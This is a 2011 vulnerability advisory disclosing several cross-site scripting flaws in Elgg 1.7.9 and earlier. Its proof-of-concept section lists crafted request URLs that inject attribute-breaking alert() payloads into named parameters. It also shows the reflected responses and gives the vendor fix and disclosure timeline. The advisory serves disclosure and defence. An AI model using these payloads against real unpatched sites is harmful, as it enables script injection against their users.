Elgg 1.7.9 Cross Site Scripting

`Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities  
  
  
  
1. OVERVIEW  
  
The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross  
Site Scripting.  
  
  
2. BACKGROUND  
  
Elgg is an award-winning social networking engine, delivering the  
building blocks that enable businesses, schools, universities and  
associations to create their own fully-featured social networks and  
applications. Well-known Organizations with networks powered by Elgg  
include: Australian Government, British Government, Federal Canadian  
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,  
Johns Hopkins University and more (http://elgg.org/powering.php)  
  
  
3. VULNERABILITY DESCRIPTION  
  
Several parameters (page_owner, content,internalname, QUERY_STRING)  
are not properly sanitized, which allows attacker to conduct Cross  
Site Scripting attack. This may allow an attacker to create a  
specially crafted URL that would execute arbitrary script code in a  
victim's browser.  
  
  
4. VERSIONS AFFECTED  
  
Elgg 1.7.9 <=  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
  
XSS (Browser All)  
  
N.B. User login is required to execute.  
  
vulnerable parameters: page_owner, content,internalname, QUERY_STRING  
______________________________________________________________________________________________  
  
REQUEST:  
  
http://localhost/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f  
  
http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true  
  
http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22  
  
http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22  
  
  
XSS (Exploitable in Older versions of Browsers - IE/FF)  
vulnerable parameters: send_to,container_guid  
=========================================================  
  
REQUEST:  
  
http://localhost/elgg/pg/messages/compose/?send_to=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22s  
  
  
Portion of RESPONSE:  
  
<input type="hidden" name="send_to" value=""  
style="background-image:url(javascript:alert(/XSS/))" x="s" />  
  
  
REQUEST:  
  
http://localhost/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22  
  
  
Portion of RESPONSE:  
  
<input type="hidden" name="container_guid" value=""  
style="background-image:url(javascript:alert(/XSS/))" x="s" />  
  
  
  
6. SOLUTION  
  
Upgrade to 1.7.10 or higher.  
  
  
7. VENDOR  
  
Curverider Ltd  
http://www.curverider.co.uk/  
http://elgg.org/  
  
  
8. CREDIT  
  
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN  
Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2011-06-09: vulnerability reported  
2011-06-14: vendor released fixed version  
2011-07-30: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting  
Project Home: http://elgg.org/  
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
CWE-79: http://cwe.mitre.org/data/definitions/79.html  
  
  
#yehg [2011-07-30]  
  
  
---------------------------------  
Best regards,  
YGN Ethical Hacker Group  
Yangon, Myanmar  
http://yehg.net  
Our Lab | http://yehg.net/lab  
Our Directory | http://yehg.net/hwd  
`